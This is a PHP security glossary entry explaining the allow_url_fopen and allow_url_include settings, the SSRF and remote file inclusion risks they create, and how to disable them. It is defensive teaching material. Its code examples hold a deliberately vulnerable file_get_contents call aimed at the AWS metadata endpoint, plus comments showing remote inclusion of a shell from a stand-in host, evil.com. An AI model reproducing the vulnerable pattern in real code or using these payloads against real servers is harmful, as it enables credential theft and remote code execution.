allow_url_fopen / allow_url_include
Also Known As
allow_url_fopen setting
remote file open
URL file wrapper
TL;DR
PHP INI settings that permit file functions and include/require to load remote URLs — a major SSRF and RFI enabler.
Explanation
allow_url_fopen permits file_get_contents(), fopen(), and similar functions to fetch remote HTTP/FTP URLs. allow_url_include goes further, enabling include() and require() to load remote scripts — enabling Remote File Inclusion (RFI) attacks where an attacker includes and executes a PHP file from an attacker-controlled server. Both settings should be disabled in production (allow_url_fopen = Off, allow_url_include = Off) unless remote fetching is explicitly required, in which case use cURL with strict URL validation instead.
Common Misconception
✗ Disabling allow_url_fopen prevents all remote HTTP requests from PHP. It only affects URL-aware file functions like file_get_contents() with a URL — cURL is completely unaffected and can still make outbound requests regardless of this setting.
Why It Matters
allow_url_fopen enables PHP's file functions to fetch remote URLs — combined with user-controlled paths, it enables SSRF and remote file inclusion vulnerabilities.
Common Mistakes
- Leaving allow_url_fopen enabled in production when it is only needed in specific scripts.
- Using file_get_contents($userInput) where user input can be a URL — SSRF via allow_url_fopen.
- Not realising that allow_url_fopen affects include/require when allow_url_include is also enabled.
- Believing that allow_url_fopen is safe because you only call it with known paths — input sanitisation can be bypassed.
Avoid When
- Any production web application — allow_url_fopen enables remote file inclusion vulnerabilities if user input reaches file functions.
- When Guzzle, cURL, or any HTTP client library is available — use them instead for explicit, safe HTTP calls.
- Shared hosting environments where you cannot control what other tenants do with the setting.
When To Use
- Strictly controlled CLI scripts on trusted infrastructure where input is never user-supplied.
- Legacy code that cannot yet be refactored — disable it in php.ini and enable only where truly required.
- Never use with user-supplied file paths — always use explicit HTTP client libraries for remote requests.
Code Examples
✗ Vulnerable
// allow_url_fopen=On in php.ini enables this SSRF:
$content = file_get_contents($_GET['source']);
// ?source=http://169.254.169.254/latest/meta-data/ — AWS metadata
✓ Fixed
; php.ini
allow_url_fopen = Off ; prevents file_get_contents('http://evil.com/shell.php')
allow_url_include = Off ; prevents include('http://evil.com/shell.php') — critical
// For HTTP requests, use GuzzleHTTP — explicit, configurable, auditable:
use GuzzleHttp\Client;
\$client = new Client(['timeout' => 5, 'verify' => true]);
\$response = \$client->get('https://api.example.com/data');
\$body = (string) \$response->getBody();References
Tags
🤝 Adopt this term
£79/year · your link shown here
Added
15 Mar 2026
Edited
25 Mar 2026
Views
111
🤖 AI Guestbook educational data only
|
|
Last 30 days
Agents 0
No pings yet today
ChatGPT 1
ChatGPT 57
Perplexity 15
Amazonbot 14
Unknown AI 4
Ahrefs 4
SEMrush 3
Google 2
Majestic 1
Also referenced
How they use it
crawler 92
pre-tracking 8
Related categories
⚡
DEV INTEL
Tools & Severity
🟠 High
⚙ Fix effort: Low
⚡ Quick Fix
Set allow_url_fopen=Off in production php.ini — use cURL explicitly instead, which gives you full control over timeouts, TLS verification, and redirect following
📦 Applies To
PHP 5.0+
web
cli
🔗 Prerequisites
🔍 Detection Hints
allow_url_fopen=On in production; file_get_contents('http://...') for external requests; no timeout on URL fetch via file wrappers
Auto-detectable:
✓ Yes
semgrep
lynis
⚠ Related Problems
🤖 AI Agent
Confidence: High
False Positives: Low
✓ Auto-fixable
Fix: Low
Context: Line
CWE-441
CWE-918